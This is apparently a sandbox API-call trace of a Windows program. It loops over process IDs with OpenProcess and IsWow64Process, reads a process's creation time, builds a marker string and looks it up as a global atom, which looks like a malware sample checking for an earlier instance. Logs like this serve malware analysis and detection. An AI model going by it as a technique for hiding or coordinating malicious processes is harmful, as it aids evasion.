	[0099.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x394
	[0099.936] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.936] CloseHandle (hObject=0x394) returned 1
	[0099.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x394
	[0099.937] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.937] CloseHandle (hObject=0x394) returned 1
	[0099.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x394
	[0099.937] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.937] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0099.937] GetProcessTimes (in: hProcess=0x394, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0099.937] wsprintfA (in: param_1=0x67eb18, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0099.938] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.938] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0099.938] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0099.938] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0099.938] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0099.938] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0099.938] CloseHandle (hObject=0x394) returned 1
	[0099.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0099.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x394
	[0099.939] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.939] CloseHandle (hObject=0x394) returned 1
	[0099.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x394
	[0099.939] IsWow64Process (in: hProcess=0x394, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0099.939] CloseHandle (hObject=0x394) returned 1
	[0100.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0100.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0100.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0100.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0100.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0100.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0100.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0100.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0100.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0100.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0100.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0100.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0100.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0100.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0100.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0100.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0100.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0100.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0100.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2d4
	[0100.114] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.114] CloseHandle (hObject=0x2d4) returned 1
	[0100.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0100.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0100.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2d4
	[0100.114] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.114] CloseHandle (hObject=0x2d4) returned 1
	[0100.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0100.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2d4
	[0100.115] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.115] CloseHandle (hObject=0x2d4) returned 1
	[0100.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2d4
	[0100.115] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.115] CloseHandle (hObject=0x2d4) returned 1
	[0100.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2d4
	[0100.115] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.115] CloseHandle (hObject=0x2d4) returned 1
	[0100.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2d4
	[0100.115] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.115] CloseHandle (hObject=0x2d4) returned 1
	[0100.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2d4
	[0100.115] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.116] CloseHandle (hObject=0x2d4) returned 1
	[0100.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2d4
	[0100.116] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.116] CloseHandle (hObject=0x2d4) returned 1
	[0100.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0100.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2d4
	[0100.116] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.116] CloseHandle (hObject=0x2d4) returned 1
	[0100.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2d4
	[0100.116] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.116] CloseHandle (hObject=0x2d4) returned 1
	[0100.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x2d4
	[0100.116] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.116] CloseHandle (hObject=0x2d4) returned 1
	[0100.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2d4
	[0100.117] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.117] CloseHandle (hObject=0x2d4) returned 1
	[0100.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2d4
	[0100.117] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.117] CloseHandle (hObject=0x2d4) returned 1
	[0100.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2d4
	[0100.117] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.117] CloseHandle (hObject=0x2d4) returned 1
	[0100.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2d4
	[0100.117] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.117] CloseHandle (hObject=0x2d4) returned 1
	[0100.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2d4
	[0100.117] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.117] CloseHandle (hObject=0x2d4) returned 1
	[0100.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2d4
	[0100.118] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.118] CloseHandle (hObject=0x2d4) returned 1
	[0100.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2d4
	[0100.118] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.118] CloseHandle (hObject=0x2d4) returned 1
	[0100.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2d4
	[0100.118] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.118] CloseHandle (hObject=0x2d4) returned 1
	[0100.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2d4
	[0100.118] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.118] CloseHandle (hObject=0x2d4) returned 1
	[0100.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2d4
	[0100.118] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.118] CloseHandle (hObject=0x2d4) returned 1
	[0100.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2d4
	[0100.119] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.119] CloseHandle (hObject=0x2d4) returned 1
	[0100.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2d4
	[0100.119] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.119] CloseHandle (hObject=0x2d4) returned 1
	[0100.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2d4
	[0100.119] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.119] CloseHandle (hObject=0x2d4) returned 1
	[0100.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2d4
	[0100.119] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.119] CloseHandle (hObject=0x2d4) returned 1
	[0100.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2d4
	[0100.119] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.119] CloseHandle (hObject=0x2d4) returned 1
	[0100.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2d4
	[0100.120] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.120] CloseHandle (hObject=0x2d4) returned 1
	[0100.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2d4
	[0100.120] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.120] CloseHandle (hObject=0x2d4) returned 1
	[0100.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2d4
	[0100.120] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.120] CloseHandle (hObject=0x2d4) returned 1
	[0100.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2d4
	[0100.120] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.120] CloseHandle (hObject=0x2d4) returned 1
	[0100.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2d4
	[0100.120] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.120] CloseHandle (hObject=0x2d4) returned 1
	[0100.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2d4
	[0100.121] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.121] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0100.121] GetProcessTimes (in: hProcess=0x2d4, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0100.121] wsprintfA (in: param_1=0x6800f0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0100.121] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.122] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0100.122] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.122] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0100.122] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0100.122] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0100.122] CloseHandle (hObject=0x2d4) returned 1
	[0100.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0100.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2d4
	[0100.122] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.122] CloseHandle (hObject=0x2d4) returned 1
	[0100.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2d4
	[0100.122] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.122] CloseHandle (hObject=0x2d4) returned 1
	[0100.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0100.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0100.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0100.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0100.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0100.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0100.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0100.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0100.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0100.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0100.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0100.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0100.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0100.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0100.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0100.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0100.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0100.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0100.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2d4
	[0100.282] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.282] CloseHandle (hObject=0x2d4) returned 1
	[0100.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0100.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0100.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2d4
	[0100.283] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.283] CloseHandle (hObject=0x2d4) returned 1
	[0100.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0100.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2d4
	[0100.283] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.283] CloseHandle (hObject=0x2d4) returned 1
	[0100.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2d4
	[0100.283] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.283] CloseHandle (hObject=0x2d4) returned 1
	[0100.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2d4
	[0100.283] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.283] CloseHandle (hObject=0x2d4) returned 1
	[0100.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2d4
	[0100.284] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.284] CloseHandle (hObject=0x2d4) returned 1
	[0100.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2d4
	[0100.284] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.284] CloseHandle (hObject=0x2d4) returned 1
	[0100.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2d4
	[0100.284] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.284] CloseHandle (hObject=0x2d4) returned 1
	[0100.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0100.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2d4
	[0100.284] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.284] CloseHandle (hObject=0x2d4) returned 1
	[0100.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2d4
	[0100.285] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.285] CloseHandle (hObject=0x2d4) returned 1
	[0100.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x2d4
	[0100.285] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.285] CloseHandle (hObject=0x2d4) returned 1
	[0100.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2d4
	[0100.285] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.285] CloseHandle (hObject=0x2d4) returned 1
	[0100.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2d4
	[0100.285] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.285] CloseHandle (hObject=0x2d4) returned 1
	[0100.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2d4
	[0100.285] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.285] CloseHandle (hObject=0x2d4) returned 1
	[0100.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2d4
	[0100.286] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.286] CloseHandle (hObject=0x2d4) returned 1
	[0100.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2d4
	[0100.286] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.286] CloseHandle (hObject=0x2d4) returned 1
	[0100.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2d4
	[0100.286] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.286] CloseHandle (hObject=0x2d4) returned 1
	[0100.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2d4
	[0100.286] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.286] CloseHandle (hObject=0x2d4) returned 1
	[0100.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2d4
	[0100.286] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.286] CloseHandle (hObject=0x2d4) returned 1
	[0100.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2d4
	[0100.286] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.287] CloseHandle (hObject=0x2d4) returned 1
	[0100.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2d4
	[0100.287] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.287] CloseHandle (hObject=0x2d4) returned 1
	[0100.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2d4
	[0100.287] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.287] CloseHandle (hObject=0x2d4) returned 1
	[0100.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2d4
	[0100.287] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.287] CloseHandle (hObject=0x2d4) returned 1
	[0100.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2d4
	[0100.287] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.287] CloseHandle (hObject=0x2d4) returned 1
	[0100.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2d4
	[0100.288] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.288] CloseHandle (hObject=0x2d4) returned 1
	[0100.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2d4
	[0100.288] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.288] CloseHandle (hObject=0x2d4) returned 1
	[0100.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2d4
	[0100.288] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.288] CloseHandle (hObject=0x2d4) returned 1
	[0100.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2d4
	[0100.288] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.288] CloseHandle (hObject=0x2d4) returned 1
	[0100.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2d4
	[0100.288] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.288] CloseHandle (hObject=0x2d4) returned 1
	[0100.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2d4
	[0100.289] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.289] CloseHandle (hObject=0x2d4) returned 1
	[0100.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2d4
	[0100.289] IsWow64Process (in: hProcess=0x2d4, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.289] CloseHandle (hObject=0x2d4) returned 1
	[0100.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2d4
	[0100.289] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.290] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0100.290] GetProcessTimes (in: hProcess=0x2d4, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0100.290] wsprintfA (in: param_1=0x6810f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0100.290] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.290] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0100.290] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.291] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0100.291] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0100.291] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0100.291] CloseHandle (hObject=0x2d4) returned 1
